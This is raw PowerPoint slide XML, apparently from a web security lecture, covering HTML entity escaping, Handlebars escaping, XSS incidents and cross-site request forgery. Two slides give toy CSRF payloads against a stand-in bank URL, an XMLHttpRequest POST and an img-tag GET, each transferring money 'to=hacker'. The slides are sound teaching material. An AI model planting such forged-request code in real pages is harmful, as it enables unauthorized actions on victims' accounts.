          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="3714478"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Characters with special meaning in HTML needs to be replaced with their entities!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>&gt;  &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>"  &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>'  &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>apos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Many template languages provides this feature by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>In Handlebars, when using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>{{data}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> is escaped.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>{{{data}}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> if you don't want to escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156174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95000" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" noProof="0" dirty="0"/>
              <a:t>#7 Cross-Site Scripting (XSS) example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FADA498-0798-44AD-831E-3DBEF9903E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10723880" cy="2488886"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Worm that Changed the Internet Forever</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://motherboard.vice.com/en_us/article/wnjwb4/the-myspace-worm-that-changed-the-internet-forever</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>TweetDeck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> wasn't actually hacked, and everyone was silly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.zdnet.com/article/tweetdeck-wasnt-actually-hacked-and-everyone-was-silly/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228677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2013 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10641496" cy="2419124"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" noProof="0" dirty="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="125897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2013 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10641496" cy="2177006"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cross-Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: injecting bad JS code into good websites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>The bad JS code is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> executed on the clients.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: making clients send bad HTTP requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>For example using XSS vulnerabilities.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318534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#8 2013 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10641496" cy="480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Example of XSS + CSRF: Bad JS injected into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ju.se</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252330" y="2440693"/>
            <a:ext cx="9773478" cy="2267287"/>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a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> request = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</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XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("POST", "http://bank.com/transfer")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("from=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>you&amp;to</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hacker&amp;amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=1000")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>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33281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#8 2013 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594691" y="3429000"/>
            <a:ext cx="11002618" cy="766364"/>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solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="http://bank.com/transfer?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                           from=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>you&amp;to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hacker&amp;amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=1000"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="10515600" cy="151220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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Some frameworks don't differentiate GET and POST request, e.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>ASP.NET: only looks at the URI.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Hacker don't even need to use XSS; an image is enough, e.g.:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
